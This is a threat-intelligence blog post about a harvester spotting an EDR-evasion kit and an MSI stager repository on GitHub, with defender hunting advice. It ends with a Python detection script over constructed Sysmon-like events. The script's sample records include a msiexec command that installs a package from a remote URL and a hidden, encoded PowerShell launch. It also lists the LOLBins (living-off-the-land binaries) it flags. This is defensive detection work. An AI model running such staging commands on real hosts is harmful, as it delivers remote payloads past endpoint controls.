
This Morning Our Harvester Stopped Catching Kid-Grade Token-Grabbers and Caught an EDR-Evasion Kit and an MSI Stager on GitHub. That's the Step After the VPN.

  • Writer: Patrick Duggan
  • 4 min read

For most of the past week our GitHub hunting cron has been pulling the same low tier of malware out of public repositories: Android remote-access trojans of the SpyNote family and Discord token-grabbers, the kid-grade stuff aimed at gamers and World Cup streamers, which I wrote about two days ago. This morning the stream changed character. At the top of today's catches are two repositories that are not aimed at teenagers: one tagged EDR-Bypass, an AV-and-EDR evasion toolkit, and one tagged MSIStager, a Windows Installer-based malware stager. Two repos is not a trend and I am not going to call it one, but the category is worth flagging the moment it appears, because this is operator-grade tradecraft, and it is the exact missing piece of the kill chain I have been documenting all week.


Here is why these two specifically matter, and it connects directly to the last three things we published. Akira and Qilin, two of the highest-volume ransomware crews operating right now, both get in through the edge VPN: Akira through SonicWall and Cisco SSL-VPN, Qilin through this week's Check Point IKEv1 zero-day that needs no password. Getting in is step one, but getting in does not deploy the ransomware. Between the VPN session and the encrypted network sits the endpoint detection and response agent, the EDR, whose job is to notice the attacker moving and kill the process before it spreads. So the step after the VPN, every time, is defeating or blinding that EDR. An EDR-evasion toolkit published openly on GitHub is therefore not a curiosity; it is the second tool in the same bag as the VPN exploit, available to anyone who can press the clone button, and it lowers the skill floor for the part of the intrusion that used to require real operator knowledge. The MSI stager is the delivery companion: msiexec.exe is a Microsoft-signed binary present on every Windows host, it will install a package whose path is a URL, and staging a payload through a malicious MSI is a living-off-the-land move that sails past controls watching for unsigned executables, with the real payload typically riding inside the package as an embedded binary or a custom action. We have seen the msiexec-from-URL pattern before in the TeamPCP and OpenClaw skill-payload work; it keeps recurring because it works.


What should land for a defender is the assembly line, not the individual part. A modern intrusion is no longer one bespoke tool written by one skilled person; it is a kit assembled from public components: an edge-VPN exploit to get in, an EDR-evasion module to go quiet, an MSI or LOLBin stager to deliver, an exfil utility like MEGAsync to steal, and a ransomware payload to finish. Every one of those parts is, increasingly, sitting in a public repository or a leaked builder, and our harvester catches them at the staging end, before they are wrapped into a campaign. That is the whole value of watching where the material stages rather than where the breach reports land: by the time an EDR-evasion kit shows up in an incident-response writeup, it has already been used. Catching it on GitHub the morning it is published is the left-of-boom signal, the same instinct that had us on the FreePBX zero-day, the Cisco FMC chain, and the Check Point VPN flaw before they were headlines.


The protective read, because a category note without a defender action is just trivia. If you run EDR, understand that evasion of it is now a commodity capability, which means EDR cannot be your only line. You need detections that survive the agent being blinded: network-side telemetry on the VPN and on east-west movement, identity analytics on anomalous logons, and logging that is forwarded off the host to storage the attacker cannot reach or alter from the endpoint. For the MSI and LOLBin angle, the behaviors are detectable even when the binary itself is trusted: msiexec with an http, https or ftp URL in its command line (usually paired with /q or /qn so no installer UI appears), a file named msiexec.exe running from anywhere other than System32 or SysWOW64, msiexec as the parent of powershell, cmd, wscript, cscript, mshta, rundll32 or similar, msiexec itself opening outbound connections to addresses outside your ranges, and signed-binary proxy execution generally. Windows Installer's own MsiInstaller events in the Application log (1040 and 1042 bracket each transaction and name the package) give you a second source for the package path on hosts where the EDR telemetry is the thing being tampered with. And the strategic point for anyone running the edge appliances in this week's posts: patch the VPN, yes, but assume the crew that gets through it is carrying exactly this kind of EDR-evasion and LOLBin staging, and build the layers that catch the steps after the front door, not just the front door.
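The msiexec hunts above, expressed as rules over process-creation and network telemetry, as an added example for this post (it is not code from the original page and not from the harvester it describes). The records are constructed here and shaped like Sysmon Event ID 1 and Event ID 3 fields; the rule names, the interpreter list and the sample command lines are assumptions for illustration, not indicators from the repositories discussed.

```python
"""Hunt rules for the msiexec / LOLBin staging pattern, run over
process-creation and network telemetry.

Added example for this post; not code from the original page or the
harvester it describes. Records are constructed below and shaped like
Sysmon Event ID 1 (process create) and Event ID 3 (network connect)
fields; nothing is read from a live system.
"""
import ipaddress
import ntpath
import re

# Interpreters and signed proxy-execution binaries a benign MSI install
# rarely needs to spawn. A hit is a lead to triage, not a verdict.
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}
# The only directories the real Windows Installer executable lives in.
EXPECTED_MSIEXEC_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
# Explicit RFC 1918 + loopback rather than ipaddress.is_private, which also
# treats documentation ranges such as 203.0.113.0/24 as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def _name(path):
    """Lower-cased file name of a Windows path (ntpath works on any OS)."""
    return ntpath.basename(path or "").lower()


def rule_msiexec_from_url(ev):
    """msiexec handed a remote package, e.g. msiexec /i https://host/x.msi /qn."""
    return (ev["EventID"] == 1 and _name(ev.get("Image")) == "msiexec.exe"
            and URL_RE.search(ev.get("CommandLine", "")) is not None)


def rule_msiexec_nonstandard_path(ev):
    """A file named msiexec.exe running outside System32/SysWOW64: a dropped
    or renamed copy, not the Windows Installer service binary."""
    image = ev.get("Image", "")
    return (ev["EventID"] == 1 and _name(image) == "msiexec.exe"
            and ntpath.dirname(image).lower() not in EXPECTED_MSIEXEC_DIRS)


def rule_msiexec_spawns_interpreter(ev):
    """An MSI custom action launching a script interpreter or LOLBin."""
    return (ev["EventID"] == 1 and _name(ev.get("ParentImage")) == "msiexec.exe"
            and _name(ev.get("Image")) in SUSPICIOUS_CHILDREN)


def rule_msiexec_external_network(ev):
    """msiexec itself connecting outside RFC 1918 space: fetching a package
    from a URL, or a custom action phoning home."""
    if ev["EventID"] != 3 or _name(ev.get("Image")) != "msiexec.exe":
        return False
    addr = ipaddress.ip_address(ev["DestinationIp"])
    return not any(addr in net for net in INTERNAL_NETS)


RULES = (rule_msiexec_from_url, rule_msiexec_nonstandard_path,
         rule_msiexec_spawns_interpreter, rule_msiexec_external_network)


def hunt(events):
    """Return (rule_name, RecordId) for every rule that fires on every event."""
    return [(rule.__name__, ev["RecordId"])
            for ev in events for rule in RULES if rule(ev)]


# Constructed telemetry: one benign local install, one benign SMB fetch,
# and four records shaped like the stager pattern. IPs are documentation ranges.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\alice\Downloads\7z2301-x64.msi"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"RecordId": 2, "EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /i https://203.0.113.10/update.msi /qn",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"RecordId": 3, "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAA",  # constructed
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
    {"RecordId": 4, "EventID": 1, "Image": r"C:\Users\Public\msiexec.exe",
     "CommandLine": r"C:\Users\Public\msiexec.exe /i stage.msi /qn",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"RecordId": 5, "EventID": 3, "Image": r"C:\Windows\System32\msiexec.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"RecordId": 6, "EventID": 3, "Image": r"C:\Windows\System32\msiexec.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 445},
]

if __name__ == "__main__":
    for rule_name, record_id in hunt(SAMPLE_EVENTS):
        print(f"record {record_id}: {rule_name}")
```

Run against the constructed records, the benign local install (record 1) and the SMB fetch from an internal server (record 6) fire nothing, while records 2 through 5 each trip exactly one rule. The interpreter rule is the noisiest in practice, since some legitimate installers do run cmd or PowerShell custom actions; tune it with an allowlist of known package names and parent command lines rather than dropping it, because it is the rule that catches the payload leaving the package.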


The honest 95%: a repository named for EDR evasion or MSI staging is publicly available offensive tooling, and a real share of that category is legitimate red-team and security research. Dual-use is the default in this space, and we tag what the bait pattern catches, not a confirmed criminal campaign behind each repo. Two repos in one morning is an observation, not a declared trend; I am flagging the category shift because it is worth watching, not because two data points make a wave. And GitHub will likely remove these once reported, which is the point of indexing the pattern and the tradecraft rather than betting on the URL. What we can tell you is that the public-code malware economy is not only the kid-grade stuff anymore, that today it surfaced the precise post-entry capabilities the top ransomware crews need after they clear your VPN, and that our harvester had them at 08:15 UTC while the rest of the internet was asleep. The front door has been the story all week. This is what they bring once they are through it.




The threat feed this post is built on

1.14M+ IOCs, STIX 2.1, precursor signals, supply-chain detection. Free API key in 30 seconds.

